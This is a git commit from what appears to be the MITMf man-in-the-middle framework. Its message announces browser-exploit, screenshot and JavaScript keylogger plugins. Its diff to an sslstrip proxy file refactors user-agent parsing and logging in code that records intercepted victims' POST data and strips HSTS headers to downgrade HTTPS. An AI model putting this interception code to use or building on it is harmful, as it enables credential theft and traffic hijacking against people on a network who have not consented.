This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)

JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completly re-written along with it's config file section Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very wierd one) , but other than that it works (did i mention i hate js?) Jskeylogger's javscript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS? Plugins that deal with javascript now read it from a file as supposed to having it built in (encoding issues) fu javascript User agent parsing is now built in and handled by core/httpagentparser.py, this because the user-agent library is a pain to install on some distros , also removes 3-4 deps which is a plus also fuck javascript
2025-07-14 17:13:50 -07:00 · 2015-05-16 00:43:56 +02:00 · 2015-05-16 00:43:56 +02:00 · ff39a302f9
commit ff39a302f9
parent 86870b8b72
32 changed files with 4378 additions and 681 deletions
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@ -24,8 +24,8 @@ import zlib
 import gzip
 import StringIO
 import sys
+import core.httpagentparser as hap

-from user_agents import parse
 from twisted.web.http import HTTPClient
 from URLMonitor import URLMonitor
 from core.sergioproxy.ProxyPlugins import ProxyPlugins
@ -72,13 +72,12 @@ class ServerConnection(HTTPClient):
    def sendRequest(self):
        if self.command == 'GET':
            try:
-                user_agent = parse(self.headers['user-agent'])
-                self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
+                mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host']))
            except Exception as e:
-                mitmf_logger.debug("[ServerConnection] Failed to parse client UA: {}".format(e))
-                self.clientInfo = "{} ".format(self.client.getClientIP())
-
-            mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
+                mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e))
+                mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host']))
+                pass
+        
            mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))

        self.sendCommand(self.command, self.uri)
@ -96,15 +95,17 @@ class ServerConnection(HTTPClient):
                postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
                if len(postdata) > 0:
                    mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
-            except UnicodeDecodeError and UnicodeEncodeError:
-                mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
-                pass
+            except Exception as e:
+                if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
+                    mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
+                    pass

        self.printPostData = True
        self.transport.write(self.postData)

    def connectionMade(self):
        mitmf_logger.debug("[ServerConnection] HTTP connection made.")
+        self.clientInfo = hap.simple_detect(self.headers['user-agent'])
        self.plugins.hook()
        self.sendRequest()
        self.sendHeaders()
@ -133,7 +134,7 @@ class ServerConnection(HTTPClient):
                self.isCompressed = True

        elif (key.lower()== 'strict-transport-security'):
-            mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.clientInfo))
+            mitmf_logger.info("{} [type:{} os:{}] Zapped a strict-trasport-security header".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0]))

        elif (key.lower() == 'content-length'):
            self.contentLength = value
@ -220,13 +221,6 @@ class ServerConnection(HTTPClient):
                dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)

-            #mitmf_logger.debug("HSTS DEBUG received data:\n"+data)   
-            #data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
-            #data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
-            #if data.find("http://w.face")!=-1:
-            #   mitmf_logger.debug("HSTS DEBUG Found error in modifications")
-            #   raw_input("Press Enter to continue")
-            #return re.sub(ServerConnection.urlType, 'http://web.', data)
            return data

        else: